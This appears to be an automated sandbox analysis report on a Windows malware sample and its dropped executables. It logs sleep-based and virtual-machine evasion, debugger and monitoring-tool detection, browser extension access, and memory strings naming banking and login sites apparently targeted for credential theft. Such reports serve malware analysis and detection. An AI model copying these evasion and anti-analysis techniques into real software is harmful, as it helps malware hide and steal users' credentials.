Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\d2YQIJa[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1085387001\DTQCxXZ.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1085392001\7b63166ddf.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\random[1].exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7132	Thread sleep count: 653 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7132	Thread sleep time: -1306653s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4348	Thread sleep count: 745 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4348	Thread sleep time: -1490745s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1672	Thread sleep count: 264 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1672	Thread sleep time: -7920000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7112	Thread sleep count: 710 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 7112	Thread sleep time: -1420710s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6500	Thread sleep count: 744 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6500	Thread sleep time: -1488744s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3636	Thread sleep count: 748 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3636	Thread sleep time: -1496748s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 596	Thread sleep count: 758 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 596	Thread sleep time: -1516758s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5344	Thread sleep count: 794 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5344	Thread sleep time: -1588794s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4980	Thread sleep count: 807 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4980	Thread sleep time: -1614807s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1672	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe TID: 5416	Thread sleep time: -150000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe TID: 5064	Thread sleep count: 2157 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe TID: 1624	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe TID: 6040	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe TID: 5480	Thread sleep time: -150000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6288	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2616	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 4536	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE TID: 5432	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5452	Thread sleep count: 2554 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6512	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6304	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 528	Thread sleep count: 2920 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3632	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6772	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2592	Thread sleep count: 769 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 764	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5956	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6848	Thread sleep count: 1378 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6668	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6944	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1083218001\qFqSpAp.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\hHtR1O06GH.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\

Source: chrome.exe, 00000022.00000002.2526975366.000078C402D48000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696497155
Source: powershell.exe, 00000020.00000002.2394562567.0000000007507000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMWar&Prod_VMware_SATA_CD00#4&224f42
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
Source: 7aencsM.exe, 00000018.00000002.2781694240.0000000000DF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8v
Source: m5UP2Yj.exe, 0000000F.00000002.2158683213.000000000189E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware}J
Source: powershell.exe, 00000020.00000002.2394562567.0000000007507000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ECVMWar&Prod_VMware_SATA_CD00#4&224f!\|8e
Source: powershell.exe, 00000020.00000002.2394562567.000000000749A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}fW
Source: skotes.exe, 00000004.00000002.2790672065.0000000001108000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000004.00000002.2790672065.0000000001148000.00000004.00000020.00020000.00000000.sdmp, Ta3ZyUR.exe, 00000009.00000002.2786807600.000000000140C000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2168233224.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2133837428.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000002.2170457306.0000000001B26000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2134074610.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2168919963.0000000001B25000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2168233224.0000000001B20000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000003.2122030581.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp, qFqSpAp.exe, 0000000E.00000002.2170484889.0000000001B5B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: mshta.exe, 00000037.00000003.2416658555.0000000002DC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: powershell.exe, 0000003E.00000002.2729065134.00000000074C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\'
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696497155
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696497155x
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696497155d
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155x
Source: qFqSpAp.exe, 0000000E.00000003.2085484073.0000000004208000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696497155p
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696497155}
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696497155u
Source: m5UP2Yj.exe, 0000000F.00000002.2158683213.000000000189E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: powershell.exe, 00000020.00000002.2394562567.00000000074B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllF
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696497155f
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696497155
Source: chrome.exe, 00000022.00000002.2523125641.000078C40280C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware Virtual USB Mouse8
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696497155s
Source: chrome.exe, 00000022.00000002.2530219702.000078C403084000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=b692a11c-8c16-44a4-950e-dd308ec81b6e
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
Source: skotes.exe, skotes.exe, 00000004.00000002.2778651756.000000000063D000.00000040.00000001.01000000.00000007.sdmp, m5UP2Yj.exe, 0000000F.00000002.2150947203.00000000011EF000.00000040.00000001.01000000.0000000E.sdmp, TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE, 0000002A.00000002.2525015693.0000000000E32000.00000040.00000001.01000000.0000001C.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696497155j
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696497155t
Source: chrome.exe, 00000022.00000002.2510568463.000001F520730000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: chrome.exe, 00000022.00000002.2510568463.000001F52078D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}085!
Source: msedge.exe, 00000041.00000003.2471691286.0000693C024C4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware20,1(
Source: Ta3ZyUR.exe, 00000009.00000002.2780603345.00000000013CC000.00000004.00000020.00020000.00000000.sdmp, jROrnzx.exe, 00000012.00000002.2329211901.000000000115C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696497155]
Source: chrome.exe, 00000022.00000002.2530219702.000078C403084000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: USB device added: path=\\?\usb#vid_0e0f&pid_0003#5&2dda038&0&5#{a5dcbf10-6530-11d2-901f-00c04fb951ed} vendor=3599 "VMware", product=3 "VMware Virtual USB Mouse", serial="", driver="usbccgp", guid=b692a11c-8c16-44a4-950e-dd308ec81b6ex
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696497155\|UE
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696497155o
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696497155
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
Source: chrome.exe, 00000022.00000002.2509304647.000001F51CC7B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000003E.00000002.2734753464.0000000007546000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000041.00000002.2554124189.00000234A6245000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696497155h
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696497155
Source: mshta.exe, 00000023.00000002.2787962265.000002A7D94B3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\x
Source: powershell.exe, 0000003E.00000002.2729065134.00000000074C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000020.00000002.2394562567.000000000749A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\l
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696497155
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696497155
Source: 7aencsM.exe, 00000018.00000002.2781694240.0000000000E4F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWNAi
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696497155t
Source: hHtR1O06GH.exe, 00000000.00000002.1528652158.00000000010BD000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1552846889.000000000063D000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000004.00000002.2778651756.000000000063D000.00000040.00000001.01000000.00000007.sdmp, m5UP2Yj.exe, 0000000F.00000002.2150947203.00000000011EF000.00000040.00000001.01000000.0000000E.sdmp, TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE, 0000002A.00000002.2525015693.0000000000E32000.00000040.00000001.01000000.0000001C.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: m5UP2Yj.exe, 0000000F.00000002.2158683213.00000000018E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696497155}
Source: qFqSpAp.exe, 0000000E.00000003.2085623957.0000000003F8B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696497155x

Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe

API call chain: ExitProcess graph end node

graph_9-22325

Source: C:\Users\user\Desktop\hHtR1O06GH.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\hHtR1O06GH.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	File opened: NTICE
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	File opened: SICE
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	File opened: SIWVID

Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\hHtR1O06GH.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083135001\Ta3ZyUR.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1083537001\m5UP2Yj.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1084785001\jROrnzx.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1084873001\7aencsM.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempJPCSKBXTSSNCCE8BLGIXIL4VZWJX18ZJ.EXE	Process queried: DebugPort
